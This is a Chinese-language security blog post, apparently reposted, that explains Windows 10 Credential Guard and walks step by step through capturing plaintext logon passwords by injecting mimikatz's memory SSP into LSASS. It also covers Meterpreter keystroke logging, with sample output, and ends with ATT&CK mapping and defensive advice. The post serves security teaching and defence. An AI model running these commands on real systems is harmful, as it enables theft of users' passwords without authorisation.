文章总结： 本文探讨了Windows10下绕过CredentialGuard获取凭据的方法。文章回顾了传统凭据收集技术，分析了CredentialGuard通过虚拟化隔离LSASS导致mimikatz失效的原理。核心内容展示了利用mimikatz注入内存型SSP的技术细节，通过该方式可在用户登录时捕获明文密码。最后给出了启用防护、监控LSASS异常及部署EDR等防御建议，强调了攻防对抗中技术理解的重要性。 综合评分： 82 文章分类： 渗透测试,内网渗透,红队,安全工具,实战经验

使用 mimikatz 绕过 Windows 10 防护

原创

寰宇秘阁 寰宇秘阁

寰宇密阁

2026年3月6日 10:00 上海

在 Windows 后渗透阶段，凭据获取（Credential Access） 始终是攻击链中极其关键的一环。传统工具 mimikatz 曾长期被用于从内存中直接提取明文密码，但从 Windows 10 开始，微软引入了一系列针对这类攻击的防护机制，使得“直接读取密码”不再像以前那样简单。

本文将围绕以下内容展开：

• Windows 凭据收集的常见方式回顾
• Windows 10 Credential Guard 的工作原理
• 为什么传统 mimikatz 技术在 Windows 10 中失效
• 通过 SSP 间接获取凭据的技术原理与流程
• 对应的 MITRE ATT&CK 技术点与防御建议

一、后渗透阶段的凭据收集回顾

在取得管理员或 SYSTEM 权限后，攻击者通常会尝试收集系统中已有的凭据信息，包括：

• 浏览器密码
• Windows Credential Manager 中保存的凭据
• 本地或域账户登录信息
• 用户实时输入的用户名与密码

1. 读取存储的凭据（T1555）

Metasploit 提供了大量用于读取已存储凭据的后渗透模块：

post/windows/gather/credentials/

这些模块依赖管理员权限，可用于提取：

• 浏览器 Keychain
• Windows 凭据管理器
• 其他第三方工具保存的密码

在 MITRE ATT&CK 中，对应技术为 T1555 – Credentials from Password Stores。

2. 明文凭据文件（T1552）

另一类经常被低估的攻击路径包括：

• 脚本中的硬编码账号密码
• 备份文件、Excel、TXT 中的明文凭据

它们往往不会引起任何网络层面的警觉，却能直接导致系统和域被攻破。 对应 MITRE ATT&CK：T1552 – Unsecured Credentials。

3. 键盘记录获取凭据（T1056.001）

如果已经获得 Meterpreter 会话，那么键盘记录功能几乎是“开箱即用”的：

meterpreter > keyscan_start
Starting the keystroke sniffer ...

在目标主机上模拟用户登录后，可以导出并停止记录：

meterpreter > keyscan_dump
Dumping captured keystrokes...
https<Shift>://intranet<CR>
gazelle01<Tab><Shift>My<Shift>Pass123<CR>

meterpreter&nbsp;>&nbsp;keyscan_stop
Stopping the keystroke sniffer...

该方式不需要管理员权限，在某些场景下也可用于进一步扩展本地访问能力。

二、Windows 10 新增的防护：Credential Guard

为了对抗 mimikatz 等内存凭据提取工具，Windows 10 引入了 Windows Defender Credential Guard。

Credential Guard 的核心思路

• 用户密码不再长期保存在普通 LSASS 内存中
• 登录凭据被转移到 隔离的 LSA 环境（LSAiso）
• LSAiso 运行在基于虚拟化的受保护环境中
• 普通操作系统（包括管理员权限）无法直接访问

这意味着：

• 传统的 sekurlsa::logonpasswords
• 基于 wdigest 的明文密码读取

在默认情况下全部失效

三、为什么 mimikatz 在 Windows 10 上“读不到密码”？

在启用了 Credential Guard 的 Windows 10 系统中：

• LSASS 与 LSAiso 之间的通信仅通过受限接口
• 明文密码不会暴露在主内存空间
• 即便是 SYSTEM 权限，也无法直接 dump 出密码

这正是 Windows 10 针对 T1003 – OS Credential Dumping 的重要改进。

四、绕过思路：通过 Security Support Provider（SSP）

尽管 Credential Guard 提升了防护级别，但在特定测试场景中，仍可以通过加载恶意 SSP的方式间接获取凭据。

SSP 的攻击思路

• 将自定义 SSP 注入到 LSASS
• 用户再次解锁屏幕或登录时
• 凭据会被 SSP 捕获并写入日志

在 MITRE ATT&CK 中，该行为被归类为：

T1556 – Modify Authentication Process

五、实战演示：使用 mimikatz 绕过 Windows 10 防护（实验环境）

1. 准备工作

• 使用 最新版 mimikatz（GitHub 官方编译版本）
• 目标系统：Windows 10
• 需要 管理员权限

项目地址： https://github.com/gentilkiwi/mimikatz

2. 启动 mimikatz 并获取调试权限

mimikatz.exe
mimikatz 2.2.0 (x64)#19041 Aug 10 2021 17:19:53
...
mimikatz # privilege::debug
Privilege '20' OK

privilege::debug 用于为后续内存操作获取调试权限。

3. 注入内存型 SSP（memssp）

由于无法直接读取内存中的明文密码，需要对 LSASS 进行补丁处理：

mimikatz # misc::memssp
Injected =)

此操作会在内存中挂载一个 SSP，用于记录后续登录凭据。

4. 锁屏并等待用户重新登录

完成 SSP 注入后：

1. 锁定 Windows 桌面
2. 等待用户再次解锁或登录

当用户输入密码时，SSP 会捕获凭据。

5. 查看捕获的密码日志

凭据将被记录在以下文件中：

type C:\Windows\System32\mimilsa.log

示例输出：

[00000000:00474a9f] WIN10-GAZELLE01\gazelle01 MyPass123

此时可以看到：

• 主机名
• 域或本地账户
• 明文密码

六、防御视角：如何应对这类攻击？

从蓝队或防守角度，应重点关注以下措施：

• ✅ 启用并强制使用 Credential Guard
• ✅ 监控 LSASS 的异常内存修改行为
• ✅ 禁止或限制非必要的管理员登录
• ✅ 启用 EDR，检测 mimikatz 特征和 SSP 注入
• ✅ 定期检查系统目录中异常日志文件
• ✅ 提高用户对“锁屏即安全”的认知（实际并非如此）

结语

Windows 10 的 Credential Guard 显著提高了系统在凭据保护方面的安全性，但这并不意味着攻击面被彻底消除。 在合法授权的测试场景中，攻击者依然可以通过修改认证流程本身来绕过部分防护。

理解这些技术的真正价值在于：

帮助防御者知道攻击者还能“做到哪一步”，以及防线究竟应该设在哪里。

只有在充分理解攻击手段的前提下，防守策略才能真正发挥效果。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：寰宇密阁 寰宇秘阁 寰宇秘阁《使用 mimikatz 绕过 Windows 10 防护》